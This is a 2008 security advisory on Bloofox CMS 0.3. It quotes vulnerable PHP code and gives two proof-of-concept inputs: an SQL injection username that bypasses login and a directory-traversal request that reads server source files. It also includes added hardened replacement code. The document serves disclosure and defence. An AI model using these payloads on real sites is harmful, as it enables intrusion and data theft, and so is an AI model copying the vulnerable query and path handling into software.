Bloofox CMS SQL Injection (Authentication bypass), Source code disclosure
Date: Sun, 20 Jan 2008 09:43:47 +0330
From: [email protected]
To: [email protected]
Subject: Bloofox CMS SQL Injection (Authentication bypass), Source code disclosure
########################## WwW.BugReport.ir #########################
#
# AmnPardaz Security Research Team
#
# Title: Bloofox CMS Vulnerabilities
# Vendor: http://www.bloofox.com
# Bugs: SQL Injection (Authentication bypass), Source code disclosure
# Vulnerable Version: 0.3 (prior versions may also be affected)
# Exploitation: Remote with browser
# Fix Available: No!
################################################################
####################
- Description:
####################
BloofoxCMS is a free open source content management system (CMS).
####################
- Vulnerability:
####################
+--> SQL Injection (authentication bypass)
Code Snippet:
index.php Line#107-116
if(isset($_POST['login']) || $_GET['login'] == "true") {
    if($perm->login($db,$_POST['username'],$_POST['password']) == 1) {
        $login_ok = 1;
        if($_GET['login'] == "true") {
            load_url("index.php");
        }
    } else {
        $login_failed = 1;
    }
}
system/class_permissions.php Line#63-68
    function login($db,$user,$pass)
    {
        global $tbl_prefix;
        $pass = md5($pass);
        // $user is concatenated into the query text without escaping or validation
        $db->query("SELECT uid,username,password,groups FROM ".$tbl_prefix."sys_user"
            ." WHERE username = '".$user."' && password = '".$pass."'"
            ." && blocked = '0' && deleted = '0' && status = '1' ORDER BY username");
        $total = $db->num_rows();
        ...
There is no input validation here, so a remote attacker can bypass the login mechanism whenever magic_quotes_gpc is disabled.
POC:
Username: admin' or 1=1 /*
Password: something
+--> Source code disclosure
Code Snippet:
file.php Line#25-49
$file = $_GET['file'];
// Block external linkings
$HTTP_REFERER = $_SERVER['HTTP_REFERER'];
if(strpos($HTTP_REFERER,$_SERVER['SERVER_NAME']) == 0) {
    die("Forget It!");
}
$basedir = getcwd()."/media/files";
// create file name
$filename = sprintf("%s/%s", $basedir, $file);
// check file on server
if(!file_exists($filename)) {
    die("File not found!");
}
header("Content-Type: application/octet-stream");
$save_as_name = basename($file);
header("Content-Disposition: attachment; filename=\"".$save_as_name."\"");
// output
readfile($filename);
Input passed to the "file" parameter is not properly sanitised before being used to build the path that is read and sent back.
This can be exploited to read arbitrary files through directory traversal attacks or by passing full paths.
POC:
GET: http://servername/bloofoxCMS_0.3/file.php?file=../../system/class_mysql.php
Referer: http://servername/
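Hardened counterparts to both snippets above (the login() query and the file.php download), added here as an example and not bloofox code. It assumes a PDO connection $pdo, passes the table prefix as a parameter instead of a global, and uses login() and resolveDownload() as hypothetical function names.

```php
<?php
// Hardened counterparts to the two snippets above. Added example, not
// bloofox code: $pdo (a PDO connection) and the function names are assumed.

// Login without string-building the query: the username travels as a bound
// parameter, so "admin' or 1=1 /*" is matched literally and finds no row.
function login(PDO $pdo, string $tbl_prefix, string $user, string $pass): ?array
{
    // $tbl_prefix is configuration, not user input, so interpolating it is safe.
    $stmt = $pdo->prepare(
        "SELECT uid, username, password, groups FROM {$tbl_prefix}sys_user"
        . " WHERE username = :user AND blocked = '0' AND deleted = '0' AND status = '1'"
    );
    $stmt->execute([':user' => $user]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    // The original stores md5($pass); compare it in constant time. Moving to
    // password_hash()/password_verify() would be the real fix for the hashing.
    if ($row === false || !hash_equals($row['password'], md5($pass))) {
        return null;
    }
    return $row;
}

// Download path resolution: only a bare file name is accepted, and the
// canonical path must still sit under $basedir after symlinks are resolved.
function resolveDownload(string $basedir, string $file): ?string
{
    // Rejects "../../system/class_mysql.php", "/etc/passwd" and NUL-byte tricks.
    if ($file === '' || strpos($file, "\0") !== false || $file !== basename($file)) {
        return null;
    }
    $base = realpath($basedir);
    $path = realpath($basedir . '/' . $file);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

// Replacement for the body of file.php.
$path = resolveDownload(getcwd() . '/media/files', $_GET['file'] ?? '');
if ($path === null) {
    http_response_code(404);
    exit('File not found!');
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
readfile($path);
```

The bare-name check alone stops both PoC inputs; the realpath() comparison is defence in depth against symlinks placed inside media/files.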
####################
- Credit :
####################
Original advisory: http://bugreport.ir/?/27
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
WwW.BugReport.ir
WwW.AmnPardaz.com